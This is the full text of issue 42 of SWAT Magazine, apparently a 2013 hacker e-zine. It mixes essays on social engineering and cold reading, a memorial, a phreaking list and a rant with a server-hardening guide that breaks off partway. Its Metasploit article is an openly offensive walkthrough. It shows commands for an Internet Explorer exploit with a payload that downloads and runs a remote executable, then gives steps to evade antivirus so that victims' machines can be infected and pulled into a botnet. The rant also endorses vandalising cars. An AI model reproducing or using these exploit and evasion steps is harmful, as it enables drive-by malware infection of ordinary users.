South West Anarchy Team presents...

[SWAT Magazine logo]

\------------------------------------------------------------------------------/
                             ISSUE 42 - JUNE 2013
/------------------------------------------------------------------------------\

        /--------------------------------------------\
        |                                            |
        |"Do not meddle in the affairs of dragons,   |
        | for you are crunchy and good with ketchup" |
        |                                            |
        |--------------------------------------------|
        |                                    Unknown |
        \--------------------------------------------/

http://www.swateam.org
http://www.swateam.org.uk
firestarter@swateam.org.uk

12 years since the last release!!!!! Bloody hell, how things have changed, although I'm glad to say that the site has remained online. I did lose the old .org domain but then, after many, many years, I finally got it back. So we now squat at the .org.uk and .org domains. It's not to say that articles haven't been released during that time, although not many, and there are more articles written and not released, forever remaining unfinished, sat on a hard drive somewhere. But we're back, kinda.
Given this is the first magazine release in over a decade and the world has changed, changed a lot, and I don't want to wake up with an MP5 stuck in my face, I'm sad to say that there won't be any more of the fun, dangerous, absurd and downright entertaining articles on making explosives using nothing more than a couple of ink cartridges and several boxes of matches. Sad, I know, but after all that terrorism bollocks over the years MI5 don't seem to enjoy such things being released any more. But as you should all know, you can still find the old works on the site in the good ol' fashioned SWAT b00k!!

So, instead of sticking bomb making articles in there I figured that I'd turn my hand to articles about survival and bushcraft. At least building traps and other assorted survival goodies won't get me locked up, well, it depends how big I build them but you get the idea. Anyhow, without further ado....

+------------------------------------------------------------------------------+
|                                   Contents                                   |
+---+--------------------------------------------------------------------------+
| # |Article title +++++++++++++++++++++++++++++++++++++++++++++++++ Author +++++++|
+---+--------------------------------------------------------------------------+
|00:|Introduction......................................... -=The Firestarter=- |
|01:|Mj - Our Friend...................................... -=The Firestarter=- |
|02:|First Thoughts.............................. Brakis & -=The Firestarter=- |
|03:|The Soft Touch of Social Engineering.............................. Brakis |
|04:|Why You Are Important............................................. Brakis |
|05:|Metasploit Exploit Pack.............................. -=The Firestarter=- |
|06:|The Art of Cold Reading........................................... Brakis |
|07:|You Were a Phreaker if you........................................ Brakis |
|08:|Rambles and Rants - Social Herding................................. Briar |
|09:|Proactive Server Defence............................. -=The Firestarter=- |
|10:|Three Shades of Green, and The Viridian Design Movement.. -=The-Doh-Boy=- |
|11:|Fiction: Burnt by Burner...................................... davethefan |
|12:|Cover Yourself From Prism............................ -=The Firestarter=- |
|13:|Services and Daemons................................. -=The Firestarter=- |
|14:|SWAT Magazine Info........................................................|
|15:|Wrap up and Disclaimer....................................................|
+---+--------------------------------------------------------------------------+

+------------------------------------------------------------------------------+
| Mj - Our Friend by -=The Firestarter=-                                       |
+------------------------------------------------------------------------------+

It was May 3rd at 16:20 when Phreazoid got in touch with me and a few of the others; it was to share the sad news that our old comrade and long time friend Mj had passed away. I have to say the news hit me hard. Mj was a good friend that I'd known for years, back in SWAT's hey-day when we were at our peak and APT/Krash Magazine were in the scene with us (Mj, Ody, Chicane, Exegency). While it had been a while since I had spoken to Mj, he was always a familiar friend that I could catch on IRC and chat to.
Over the years of meeting people in the scene, chatting to them, bouncing ideas around or just having a laugh, I don't think you realise just how much the bond between people and groups grows. Here I was with this news that we'd lost one of our own, chatting with people that I'd known for years, albeit maybe not spoken to most of them for a very long time; we were all as shocked as each other. The small community that we were was still alive, and feeling the loss. Then the conversations turned to the good old days, of people we knew and who was in touch with who, so we could get the word out etc.

Hearing that you've lost a friend that was once part of your day to day life isn't a good thing, but it does make you reflect on what you have now in your life as well as looking back at the good times you shared. Here we were, a group of people that hadn't spoken or seen much of each other for a time, now all brought together under such tragic circumstances.

Mj will be missed. Each and every one of us that knew him held respect for the guy, a genuine hacker: he had knowledge, he helped people, he shared things. He was a person too, and a good one. While I never knew him outside of the h/p scene many of the others did, and the condolences for Mj that many have shared are moving. I must be honest, I was very moved myself by the news and it was decided that in his memory we would release commemorative issues of the old zines. So we got the old crew together and decided to restart SWAT Magazine.

Mj, my friend, you will be missed dearly. Your untimely and premature passing has brought home just how mortal we all are, and that we should live our lives to their fullest, as after all one day we must all pass on. Mj, I hope you knew just how popular you were with us all and I am proud to say that I dedicate this, our best ever issue of SWAT Magazine, to you. You will never be forgotten and you will always be in our hearts and minds.
+------------------------------------------------------------------------------+
| First Thoughts                                                               |
+------------------------------------------------------------------------------+

The last time SWAT released an issue, which was in November 2001, the world was a very different place. Britain had a Labour government, you could be a terrorist and not be Muslim, you could buy a pint of beer for under £2.00, we were all excited about the turn of the millennium and the future seemed so full of promise. You could get a credit card, loan or mortgage with very little to no income. Drugs were more dangerous than legal highs, not the other way around. The phone in my pocket now packs 5 times more computing power than was in my beige desktop which ran Mandrake Linux and Windows 2000. The heady days of prepay phones and dodgy guys in sheds chipping Philips Digas to get unlimited calls.

Blah blah fucking blah........nobody gives a fuck. The important thing is that after more years and failed attempts to get the ball rolling than we care to count, we have finally got our shit together and brought back the awesome mag that was loved by so many back in the "oldsk00l" dayz. Don't worry though, this won't be like Star Wars where the latest installments are a lot of shite. This zine is continuing where it left off, only now we have a twelve year backlog of accumulated knowledge to share with the masses.
It was always our purpose to publish any information to anyone in the spirit of freedom of the individual and to support your right to not let anyone else, apart from yourself, make decisions for you. So in that spirit we bring you something we have all (including those who wrote it) waited a long time for.

Boyz and Gurlz...Layd33z and G3n7lem3n

We iz proud to present SW4T 42

Luv Hugz and a big ol' fuckin :D

Firestarter and Br4kis
(Who in the past 12 years have started a successful online florist based in Devonshire, for that special occasion please visit www.yomamaspwettyflower.com)

+------------------------------------------------------------------------------+
| The Soft Touch of Social Engineering By Brakis                               |
+------------------------------------------------------------------------------+

This article is written in memory of MJ, whose tragic and untimely passing is a great loss to the hacking community. Obviously to those that knew him personally (whose number I cannot count myself amongst) his presence will be most painfully missed. In tragedy there can often be some hope; as in the case of the feuding or apathetic family who are brought out of hiding by a sudden bereavement, so is the case with this community who, in memory of a beloved friend, feel it is time to remind the world of what he and they did. The things we were interested in and the values that we held. It is in this spirit I would like to submit for your entertainment and nostalgia...
The Soft Touch of Social Engineering By Brakis.

Social Engineering, or human hacking, has been around since humans first evolved to communicate linguistically with each other and as such it is something that you will have done, either consciously or unconsciously, at some point today. Let me give you some examples of some subtle Social Engineering I have undertaken today without thinking:

I threw a cat toy out of my bedroom so that the cat would chase it out. I didn't want to play with her, I just wanted her out of my bedroom.

The guy in Starfucks asked me how I was today. I told him I was well, I then reciprocated by asking him how he was. The two of us couldn't give a shit about how the other was. We have just become so familiar that we feel the need to take part in an arbitrary conversation which really serves no purpose.

A colleague asked me what I did last night. My answer was simple and mundane, not because I was doing anything secretive or subversive, but the thing I was actually doing was either so complicated and idiosyncratic or outside what we call the norms of socially acceptable conversation that it wasn't worth my time to explain the context which led to me undertaking the previous evening's venture. Consider the following:

Conversation 1 - with SRSE (subtle and routine social engineering)

Colleague: "What did you do last night mate?"
Brakis:    "Ah fuck all mate, I watched Family Guy and had a pretty early night. What about you?"
Colleague: "I just chilled out with the Mrs"
Brakis:    "Cool"

Conversation 2 - without SRSE

Colleague: "What did you do last night mate?"
Brakis:    "Well I got home, planned to masturbate. I couldn't find a suitable whack off video on pornhub because I have desensitized myself to porn over the last fifteen or so years and I have pretty much killed my internal fantasy mechanism and I actually find most porn pretty boring but I still compulsively watch it because I can't undo that little bit of internal programming. Due to the fact that I skipped lunch and was starving I ended up going to the take away and getting a huge kebab which I later felt guilty about so I ended up doing hand stand push ups against the wall in a tokenistic attempt to undo the damage from the kebab. I felt pretty good after ten so I figured I would reward myself with a wank so then I had the same problem which I had the first time. I then had a successful wank to a tried and tested video on pornhub which made me wonder if I have a more meaningful relationship with the woman in the video than with the woman I am actually with. I decided I was over thinking so I spent most of the rest of the evening trying to recompile my OS kernel so that the necessary non-proprietary drivers for my wireless card would work, this makes me guilty because I know that I really should be using free software for everything. I also watched 3 episodes of Babylon 5 which I had seen countless times before... also if you make a comment about hating Sci Fi then I will hate you forever. I read a bit of a book that is too big and I think might make me smarter and then went to bed. What about you mate?".....

You get the idea. In the 2nd example there is no deception, not by omission or misinformation. This has a number of disadvantages. One being the huge waste of time and productivity lost by such a conversation, never mind the discomfort of such a conversation. The advantage of the 1st being that it maintains the social fabric that we social engineers and human hackers can take advantage of when the need or motivation arises.

Everyone wears a face which is on display all the time. It is a fusion of our physical presence, our sense of self image and self esteem, how we perceive ourselves in relation to others. It would be logical to surmise that this is an innate or automatic reaction. Necessary both as a defence mechanism and as a utility for attraction (think about when you are trying to attract the opposite sex).
Being mindful of these subtleties and innate abilities serves two core purposes which are useful to the would be social engineer.

The first of these is that it makes you more aware of your own internal dialogues and the noise that is in your head. Part of the fact is that a great deal of our innate deception extends to ourselves as well. Yes, believe it or not, you lie to yourself! Again, some of these are useful and some are not. This in turn serves to make you better at social engineering as you are able to be more tuned in to the little deceptions which ultimately make us better at what we do. The good social engineer must be aware of this, the subtle social engineering which makes up the fabric of most of our communication.

Take for instance the following example. In 2005 myself and an associate had been contracted by a technology start up in Europe to test their human infrastructure against social engineers, information gatherers and the like. It became apparent to us that the scale of what was required meant we would have to use extra help. We had a number of candidates that were sought through both informal and formal contacts. One candidate claimed to be a professional gambler who had a very effective track record in a sales company. Sure enough his references and contacts seemed to stack up, he had an interest in computers and wanted to get some experience of social engineering (as part of the process we even went on a trip with him to the casino so we could see his gambling success). In the end we didn't take him on for this particular project because there was something missing. The thing that was missing was mindfulness of the subtleties of the communication and that innate deception which continually takes place. He was a successful salesman because he had learned patterns and ways of talking to people which gained results. He was a successful gambler because he had learned techniques which improved his odds and he had convinced himself that he was a successful gambler. As is the case with most gambling, the odds over the long run could be read either positively or negatively. Due to the fact that he was not aware of the organic way people communicate, he would find it more difficult to think on his feet and, in the case of this contract, prove to be an ineffective tester or perhaps even a liability.

Patterns and techniques are highly useful and can be very effective, but they have a limit to what they can do and a more intrinsic understanding is necessary. Simply put, to be a good social engineer it is always more effective to pay attention to the minutiae of human communication as it allows your innate abilities and awareness to increase, thus making you naturally better. Intuition can be fed!

The second core purpose is (perhaps in contrast to the first) the development of micro-techniques that make you more effective when approaching your projects and showing others how to do the same. At this point you might be asking "Hey Hey!!! Mr Brakis Dude....you just told us that we want to gain an understanding of innate communication and the subtleties of communication and avoid techniques and patterns." Yes I did. The distinction between what you are trying to gain and what our friend the gambling salesman has is that your techniques will be unique to you and rooted in the underlying nature of communication. Not some hackneyed technique from a book that may work 60% of the time but fails to take into account that people are individuals with entirely different perceptions.

With this in mind I would like to invite you to try and be more mindful of the small things about your communication. Try and keep a mental log of all the little ways in which you are dishonest or lie by omission. Once you have done that, figure out what the reason was.
This will start you on the path to becoming a more skilled, natural and intuitive social engineer.

Hack the human, hack the system.

Brakis 2013

All text contained within this article is intended solely for information and entertainment purposes. Any legal action or prosecution which results from anything taken from the article is entirely the responsibility of the reader and the author takes no responsibility for any legal action, injury or death which happens as a result of the actions of the reader. This disclaimer applies to all articles, information and consultation provided by the author. This article remains the intellectual property of the author. It may be redistributed freely provided that the article remains intact and all credits, disclaimers and copyright notices remain attached to the article.

+------------------------------------------------------------------------------+
| Why You Are Important By Brakis                                              |
+------------------------------------------------------------------------------+

Why you are important.

I imagine if you are reading this then you are somebody who in some shape or form attaches yourself to something that society perhaps looks down upon or is threatened by. You, my friend, brother or sister, are exactly what the world needs. Years ago my friends and I explored computers and phone systems to gain an understanding of what it is people didn't want us to understand.
This is particularly poignant at this moment in time as the world is being turned up on its head by revelations that privacy is a thing of the past and that pretty much everything we say or do is being watched. I don't think personally this is that much of a surprise to anyone, but I think that as our liberty dies we are too complacent in doing nothing about it.

John Stuart Mill in his book 'On Liberty' talks a lot about how a healthy society needs individuals to be innovative to develop, to allow for new ideas to take hold and for people to grow and become better. Think of all the positive things we have done and developed in the last twenty years. We have the ability to communicate with people all over the world with very little effort, we have unparalleled access to information. We have new cooperative initiatives from people who genuinely want to make the world a better place.

You are important because without people like you, people who strive, people who love, people who know that we as a species deserve the world we want to live in, without people like you that change will never come. We will be dominated by those who seek to keep the majority down, to keep everyone quiet, to keep good ideas out of the public eye.

You might be reading this and thinking "No way man. I'm not important! I am just a....." Well fuck that, you are important. You just don't know how powerful you are yet. You have done and will do great things which will come from a place of genuine excitement and compassion, and those that seek to keep you down, either because they are scared of what you can do or because you remind them of what they have not been brave enough to do themselves, will be left behind in your dust. Ideas which make the world a better and more equal place come along like buses (there are none for a while but then they all come at once). You have to step out and be brave and graciously accept the experiences which have been given to you.
You are important because you are that individual that makes society innovative, which makes society better. Those brave, stupid, crazy ideas you have are what is going to save us.....and the best part is you can't do it alone....you need the rest of us to make it work too.

Much love brothers and sisters.

Brakis.

All text contained within this article is intended solely for information and entertainment purposes. Any legal action or prosecution which results from anything taken from the article is entirely the responsibility of the reader and the author takes no responsibility for any legal action, injury or death which happens as a result of the actions of the reader. This disclaimer applies to all articles, information and consultation provided by the author. This article remains the intellectual property of the author. It may be redistributed freely provided that the article remains intact and all credits, disclaimers and copyright notices remain attached to the article.

+------------------------------------------------------------------------------+
| Metasploit Exploit Pack... By -=The Firestarter=-                            |
+------------------------------------------------------------------------------+

Exploit packs are bits of kit sold on the black market with one intention: installing malware on unsuspecting victims using a variety of exploits, usually delivered via the web browser.
They sell for thousands, well, some do; some for a few hundred, and some for just a few quid (although they are mostly very expensive). Now as much as I'd love to wire a few grand over to some random Russian that I've never met in order to get the latest and most evil piece of drive-by installing software out there today, I am a bit of a cheapskate when it comes to paying for things I can do myself. Now I've several exploit packs in my possession, mostly downloaded from the far flung corners of the internet, all of them pretty much outdated and likely to fail on all but the least updated boxes that have the misfortune to be connected to the internet.

The best exploit packs out there are very sophisticated in the ways that they work. That is, they will use JavaScript to analyse the browser that has opened the landing page, which is usually linked in from an innocent page on a cracked server via an iframe. It will look at what versions of Flash are installed, what versions of Java, the operating system type, browser type, IP address etc. All of this information will now get stored in an SQL database and the pack will then attempt to exploit the system. The more sophisticated kits will see what versions of Flash, Java, etc. are installed and fire off exploits that are known to work on them; this method has proven to be far more successful at exploiting machines than just firing off everything the kit has on board. Given that exploit packs usually come with a handful of exploits, mainly targeting things such as Flash, Java, Adobe Acrobat and the browser itself, and given the resources that the attack server has on board, it can be quicker to get one or two exploits in rather than trying to shove every known attack vector down the internet and onto some poor sod's machine.
Thus, if the pack sees you have a crappy never-been-updated-since-2010 version of Flash Player, it will fire off one of many exploits and get some shellcode injected in there; your machine will then proceed to download some executable file from the server and run it. Hey presto, you're now part of someone's botnet :) All very clever. You will now also be a statistic on the exploit pack's web panel showing how many machines have been hit, how many exploited and where you're from (country) etc etc.

But if we're wanting to save a bundle of cash and we're prepared to do without the web panel and statistics (I mean, let's face it, bots in the net are more than enough of a statistic compared to what some exploit pack reports), then we can utilise our favourite exploit framework and the trusty old Eee PC to create an adequate and updateable, totally free of charge malware loading device. Yes, you too can be an evil genius with nothing more than time and a computer.

Ok, so how are we going to go about achieving this goal? First off we are going to need a payload. For testing purposes we'll assume that I want to load our latest version of Satanic Hoard (our testing bot we coded in VB6 using elite ninja skills); however, like all great skid tools it's detected by every anti-virus under the sun, thus we will run it through one of our crypters and take the detection from 35/35 to 0/35. Yep, we are now fully undetected (FUD), so all those noobs with out of date machines running (their probably out of date) anti-virus software will have a nice false sense of security when we hijack their machines for evil purposes.

The next and more important step, actually probably more important than the payload, is the exploit. Metasploit comes with a whole host of wonderful methods with which to take ownership of unsuspecting machines, some more relevant to our cause than others, and the great thing about Metasploit is its ability to update itself to the latest and greatest exploits out there.
For this exercise I am going to make use of the awesome, and at time of writing newest, Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability, CVE-2013-1347. But you can browse exploit-db.com and find your own latest and most awesome pentesting codez, or be really elite and write your own, but that's another article for another time.

Anyhow, let's get things going. First off, let's start metasploit:

    ./msfconsole

Now we set the exploit to be used:

    msf > use exploit/windows/browser/ie_cgenericelement_uaf

Now we set the payload:

    msf exploit(ie_cgenericelement_uaf) > set PAYLOAD windows/download_exec
    PAYLOAD => windows/download_exec

Let's configure the payload:

    msf exploit(ie_cgenericelement_uaf) > set URL http://www.swateam.org/a.exe
    URL => http://www.swateam.org/a.exe

Set what the dropped file name on the target is:

    msf exploit(ie_cgenericelement_uaf) > set EXE adobe.exe
    EXE => adobe.exe

Now run it as a background job:

    msf exploit(ie_cgenericelement_uaf) > exploit -j
    [*] Exploit running as background job.

Ok, let's test it out. We browse to the target URL and what do we get...

    [*] Using URL: http://0.0.0.0:8080/2v8xriE8VXZsONY
    [*] Local IP: http://192.168.1.10:8080/2v8xriE8VXZsONY
    [*] Server started.
    msf exploit(ie_cgenericelement_uaf) >
    [*] 192.168.1.4 ie_cgenericelement_uaf - Requesting: /2v8xriE8VXZsONY
    [*] 192.168.1.4 ie_cgenericelement_uaf - Requesting: /2v8xriE8VXZsONY
    [*] 192.168.1.4 ie_cgenericelement_uaf - Target selected as: IE 8 on Windows 7
    [*] 192.168.1.4 ie_cgenericelement_uaf - Sending HTML...

Ok, looks good on the attack side of things, but what happens on the target side of things? Well, AVG goes mental and starts crying about a virus!!! Oh no, it's detected the exploit's evil attempts to lay down the pwn on windoze; we can't be having that interfering with our attempts at world domination.
First step, let's find out what's tripping things. Let's go to the web cache and acquire the webpage that tripped the alert and save the contents to a text file. Now let's look through the code and see what could have caused the problems. To check this over what we're going to do is create a new .html file, we'll call it test1.html, and we're going to paste in a block of text at a time, save it and scan it to find out what's causing the issues. Let's begin at the top...

We'll enter the first dozen or so lines into it:

    function mstime_malloc(oArg) {
        shellcode = oArg.shellcode;
        offset = oArg.offset;
        heapBlockSize = oArg.heapBlockSize;
        objId = oArg.objId;

Look dodgy, don't they? Paste, save and scan. Nothing found. Ok, let's move on and we'll add the next dozen or so lines into it. Those bits that look like:

        e = document.getElementById(objId);
        if (e == null) {
            eleId = "ZXBvS"
            acTag = ""
            document.body.innerHTML = document.body.innerHTML + acTag;
            e = document.getElementById(eleId);
        }
        try { e.values = buf; } catch (e) {}
    }

    function helloWorld() {
        sparkle = unescape("ABCD");
        for (i=0; i < 2; i++) {
            sparkle += unescape("ABCD");

They come before that nasty looking block of code. Paste, save and scan. Still nothing!?!?!?! Ok, we'll paste in the HUGE block of unescape code, that's gotta be bad ass and nasty. Still nothing! OMG, am I doing it right? Now let's add the information just below that block of code, all those f0 = document.createElement sections, now save and scan. Bingo, evil virus detected!!! I'd paste the code, but I remember when we released the iloveyouvirus and we had a fuckload of lamers complaining that we'd infected the txt documents with virii and were trying to infect people. Fuckin' noobs.

Anyhow, now we've located the section of code that's tripped the scanner, so what we need to do is change it a little so that our exploit slips past and allows us to infect the target box.
So what we now need to do is locate the exact part of the code that's making AVG throw a hissy fit. For this we create a document and paste ONE line at a time of the offending block, save and scan, slowly, line by line building up the offending block. What do we notice? We notice the line that says "collectgarbage" trips things, so we test this by putting JUST that line in a file, save and scan: nothing. We try it with the rest: it sets it off. So now we'll paste the remaining block of text into the file BUT remove the trigger line, save and scan: nothing found. So we know we have to change that line, or at the very least the parts around it. Since collectgarbage is actually a part of javascript itself we can't just rename it along with whatever calls it, so we shall try some k-rad codez to make it appear slightly different. What shall we do? We'll try adding a comment on the line above it:

  //test//

Save and scan. Nothing found! Perfect, so now all we need to do is alter the main module in metasploit to ensure we always have a FUD attack to carry out on poor unsuspecting victims. So we go:

  cd /opt/metasploit-framework/modules/exploits/windows/browser/
  nano ie_cgenericelement_uaf.rb

Scroll down to the offending line (264), add in the comment and save. You can do this to several of the top exploits, get each one running in its own directory, then simply open up an iframe to them. If the browser hitting the sites doesn't carry the correct version etc then metasploit will return with a 404, or at least it does with the ie_cgenericelement_uaf exploit. This simple strategy will work with many, many exploits; it also shows just how easy it is to rip them from metasploit for your own evil means.
If you wish to add more exploits simply repeat the above steps until you have half a dozen or so exploits running away in the background on various URLs, and either have them all opened via iframes on a page or, if you feel really special, whack up some javascript to fire victims at the relevant exploits. The world is your oyster!

+------------------------------------------------------------------------------+
| The Art of Cold Reading by Brakis.                                           |
+------------------------------------------------------------------------------+

Has there ever been a time when you, as a natural skeptic, have looked at someone and thought that they had an above average awareness of what was going on around them? Perhaps someone who appears to grasp things that you do not, or perhaps has a deeper understanding of people. Perhaps you have seen a psychic and been amazed by the level of accuracy of the predictions they are able to draw out of thin air, in spite of knowing in your heart of hearts that there are no such things as psychics. This is true for soothsayers, psychics and any other jack ass who claims to be able to see into the future. There are a couple of techniques which I will discuss here that will give you some idea of how cold reading can be applied. I will also give you a skeleton outline of how these techniques can be used in any setting.
Essential to the understanding of cold reading is the ability to realise that people are essentially patterned creatures, although you should never make too many assumptions about anyone. When cold reading (or attempting to ascertain if someone is cold reading) a fairly healthy dose of common sense must prevail. Let me give you a fairly standard example. If you think of a psychic medium, who is able to talk to the dead, what this person will be doing is finding a willing volunteer (it is safe to assume that people that have paid to sit in a room and listen to somebody that talks to ghosts in fact have the desire themselves to get in touch with someone who has died). The medium will then proceed to use a technique called shotgunning (this doesn't mean cutting the audience down with a sawn off). This involves using a series of probability guesses until someone in the audience responds. M is for Medium, A plus a number refers to an audience member. The commentary in brackets is my commentary.

  M:  I am sensing something coming through....someone.....oh it's a female whose name begins with an M or an S?
  A1: Oooh yes.
  M:  You knew a woman whose name begins with an M (how many fucking women are there with a name that begins with the letter M)
  A1: Yes, my mother, Margaret (so now the stupid bitch has just told the medium everything he needs to know, and the amount of supposedly correct guesses this guy can make will quickly get the woman's hopes up and probably empty her pockets too).

There are a number of assumptions that you can make about A1 such as: her mother has died; her relationship with her mother had some quirk, for example they used to be close but something happened; A1 wasn't there for the death of her mother; there was something she wanted to tell her but didn't have the chance.
It is also easy to make assumptions based on the kind of woman that A1 is (she may also be a man), and many of the things that cannot be ascertained by her appearance or actions can be guessed at with a binary fifty fifty guess. Link this with the fact that the audience members are looking for answers and you have a perfect set up. Cold reading can be used in a number of different situations. To become super elite at cold reading you have to start to notice people's little tells (like in poker); people give away so much from how they walk and how they act and the things they say in jest. Cold reading, as with all aspects of social engineering, can seem somewhat daunting at first. The trouble I find when getting deep into social engineering techniques is that I worry I will over think what I am doing and lose sight of what my objective is. My advice is to relax and not stress too much about figuring everything out at once. You can start small and as long as you keep certain principles in mind then you will be able to get a better reading as you practice. You are human and the subject you are trying to cold read will be human, so trust that you will get a better understanding as time goes on. To an extent it becomes second nature. It becomes innate and before you know it, you can get an accurate read on people before they have even said a word. As for the ethics of cold reading: as I have demonstrated it can be used for fraud, however do not be too hard on the poor medium because some of these poor dolts actually think they can speak to the dead and have no idea that what they are actually doing is cold reading. It is always important to stay cautious when dealing with anyone for the first time. So let cold reading be your ally.

Brakis 2013

All text contained within this article is intended solely for information and entertainment purposes.
Any legal action or prosecution which results from anything taken from the article is entirely the responsibility of the reader and the author takes no responsibility for any legal action, injury or death which happens as a result of the actions of the reader. This disclaimer applies to all articles, information and consultation provided by the author. This article remains the intellectual property of the author. It may be redistributed freely provided that the article remains intact and all credits, disclaimers and copyright notices remain attached to the article.

+------------------------------------------------------------------------------+
| You Were a Phreaker if you... By Brakis                                      |
+------------------------------------------------------------------------------+

Unfortunately it is very sad to admit, brothers and sisters, but our phreaking heyday has passed. The days of scanning 080089xxxx to find a voice mail box or a teleconferencing service are sadly behind us. Public phone boxes have been replaced with mobile phones, outdials have been replaced by Google Hangout. Never mind fucking Compuserve... With this in mind I would like to present you with a list of things that you may or may not have done which might remind you of the days of when you were a Phreaker or some such nonsense. You were a phreaker if you....
  had a long distance relationship with someone or something you had never even seen a picture of,
  got a hard on from a dial tone,
  tried blue boxing pissed by whistling the 2600 tone down a pay phone,
  ran from a phone box that a dial 100 operator was monitoring,
  done everything dodgy in a phone box except from have sex, take drugs or actually anything cool,
  be a little bit smug in the knowledge that the guy that bullied you at school could be taken down by your elite phone hacking skills,
  were in darkcyde,
  were out of darkcyde,
  got into a feud with darkcyde,
  loved darkcyde,
  hated darkcyde,
  created a beige box,
  know why this article refers to coloured boxes,
  mourn the loss of phone boxes,
  try undertaking a bizarre experiment with a phone box in a Taipei car park after one too many (this might just be me),
  installed a bluebox tone generator on your DOS system,
  loved BBS,
  viewed BT vans with a strong degree of suspicion, perhaps going as far as to call them the gestapo,
  spent countless hours speaking to people you will never see in your real life,
  invented a new box colour in your dreams,
  feel incredibly proud that you were part of something genuinely different and unique,
  had a red sore on your ear from pushing the phone receiver too close,
  smelled like a phone box,
  didn't mind the smell of piss from a phone box,
  read this article and smirked to yourself at least once.

Shamelessly to the good old days.

Brakis 2013

Please feel free to get in touch and add your own.

All text contained within this article is intended solely for information and entertainment purposes. Any legal action or prosecution which results from anything taken from the article is entirely the responsibility of the reader and the author takes no responsibility for any legal action, injury or death which happens as a result of the actions of the reader. This disclaimer applies to all articles, information and consultation provided by the author.
This article remains the intellectual property of the author. It may be redistributed freely provided that the article remains intact and all credits, disclaimers and copyright notices remain attached to the article.

+------------------------------------------------------------------------------+
| Rambles and Rants - Social Herding by Briar                                  |
+------------------------------------------------------------------------------+

Social herding: even if you don't know the term I bet you've experienced the sensation. You are in a cinema with maybe fifteen or so other people, therefore there are plenty of other seats available, but what happens when that next couple arrive - they sit in your row, but not just in your row, oh no, they sit a mere two seats away from you! That, my minions, is what I call social herding. All that space and still they have to sit near you, even when you're giving off your best 'I'm a psycho' vibe. Asshats! What prompts this need to congregate, I'm told, is an in-built, neanderthalic need to survive, and how do we survive as a species? Superior numbers, good old group living. This may indeed be the cause but it still pisses me off that these individuals allow themselves to become nothing more than bipedal sheep by not having the self awareness to sit somewhere bloody else!
Now, my temper would subside somewhat if I thought for a minute that the only reason these woolly jumpers sat next to me was because I had nabbed the prime viewing position and they were trying to muscle in, but this is not the case. To prove this to yourselves I suggest you go for a cinema visit in the near future and choose the absolute worst viewing position, i.e. down on the front row, right in the middle, and see just how many Dollies Baa their apologies as they squeeze by you for a seat. Obviously, for this experiment to work you'll have to choose a less than exceptional film to see so that there are plenty of empty seats, but given some of the dross that's on, that shouldn't be too difficult. This phenomenon is not limited to the cinema, oh no, it haunts us elsewhere too. Can you guess? Yes indeedy, the car park conundrum. Where, oh where, will I park? I know, I'll squeeze in right between that mini and that campervan in my big SUV. And is it because there are no other spaces? No, that's not it. The mini and the campervan are the only two cars in the massive hundred car capacity carpark. Is it because I want to deter thieves? (Although I've never seen the logic in that one, surely more cars just provide the grand theft auto practitioner with good cover from the cameras??) Anyway, that's not it either. Oh no, it's just that I don't want my SUV to be lonely - cars after all are social creatures. Yes, you got it, baa baa black sheep has struck again. You are now totally within your rights as a fully independent individual to key the fecker's car! I admit that perhaps this might not be viewed as a wholly constructive way to deal with the social herding epidemic but what can I say, sometimes a random act of vandalism is the only way to go. So, my minions, the moral of this little rant is - watch it on fecking DVD!
+------------------------------------------------------------------------------+
| Proactive Server Defence                                                     |
+------------------------------------------------------------------------------+

It's always good to look through the good old server logs to see what cretin or bot has tried to get into them. Actually it's a good source of getting access to a compromised machine, but that's another story. Anyhow, after looking over reams and reams of failed login attempts I figured, hell, let's carry out some Google-fu and see what bell-end is attempting to gain access to my k-rad-uber-proxy server. I mean let's face it, it's either a bot, a government or some skid trying to be cool. One day someone came along from IP address 213.248.110.43 and hammered the SSH server to try and gain access; a quick google of the IP address reveals it's a shared host, probably using one of the same passwords that it tried to gain access to the proxy with. So this makes us think, what could we do to prevent such skids attempting it in the future? I mean there's a few options available, but we must also look at the situation. The possibilities are:

  1) It was an automated bot, merely adding to the noise of the internet, and my machine was scanned along with thousands of others and it maybe got into some.
  2) It was a direct attack on our network by person or persons unknown.
  3) There's nothing in the logs because someone gained access to the system and cleaned up after themselves.
Situations 2 and 3 are the most worrying, even if it's most likely situation 1. Now one could go through the logs and run a brute force on the system that carried out the scan. Once in, all web pages could be defaced, scanning bots removed, root password changed and server rebooted. Yes, it would get noticed and cleaned up; a nice flashy colour clashing page that screams beef up your security and stay the fuck away from my servers might be all fun and good, but it doesn't really solve the issues, except maybe in the immediate short term. And it doesn't change the fact that the host could just have been set up as an attack server to gain access to others. These attack servers crop up every now and then, and trying to get into them in the same fashion that they tried will probably fail. Then there's situation 3: what if they actually got into the server and you never got to see the logs? They could be in there, backdoor the server and leech all of your secret porn stash, or even worse, what if they delete it? Going over the logs is good, but if it only shows you who failed to get into the machine, then going over it after the fact can be a little pointless. My plan is to stop them in their tracks. We want to keep an eye open for any attempt to brute force the server or scan it for exploits; not only do I want to keep them out of my server(s), I want to prevent and hinder any other attempts to get into any other system. Ok, so in order to keep our systems secure we will deploy some software to watch out for brute force attacks, in this case we will employ fail2ban which you can download from http://www.fail2ban.org. This nifty bit of kit will monitor log files for brute force attempts and block said offending IP addresses; it does this in real time so you're not waiting on cron jobs to parse the logs. It uses python and doesn't require any other dependencies, although it can optionally use gamin.
Most distributions come with it these days, for example, while testing on the pi it's just a case of:

  sudo apt-get install fail2ban

Now it's installed let's mess with the settings and features so we can get a little nasty with intruders rather than just banning them. First off we want to create a jail. The jails are basically a set of rules that fail2ban looks for and what it does in reaction to those rules being matched. The most obvious and handiest of these is to add the IP address to iptables and get all packets from the offending IP address dropped. But we're evil so we'll go a little further than that. First step, copy the default jail file for editing:

  sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local

Now we open the file for editing:

  sudo nano /etc/fail2ban/jail.local

Ok, head down to the section that is labelled DEFAULT; this is where you will specify IPs that will be ignored. This can be the local IP address, or if you are on a static then you can set it here too. This is handy if you're a bit of a numpty and forget your password more than a few times. If you have multiple servers then you can add the IP of one in here and use said server to bounce your connection to it if you need to. You will also specify how long you want the offender banned for and how many attempts to log in you will allow. Here is what we have:

  [DEFAULT]

  # "ignoreip" can be an IP address, a CIDR mask or a DNS host
  ignoreip = 127.0.0.1/8
  bantime  = 18000
  maxretry = 3

  # "backend" specifies the backend used to get files modification. Available
  # options are "gamin", "polling" and "auto".
  # yoh: For some reason Debian shipped python-gamin didn't work as expected
  #      This issue left ToDo, so polling is default backend for now
  backend = auto

  #
  # Destination email address used solely for the interpolations in
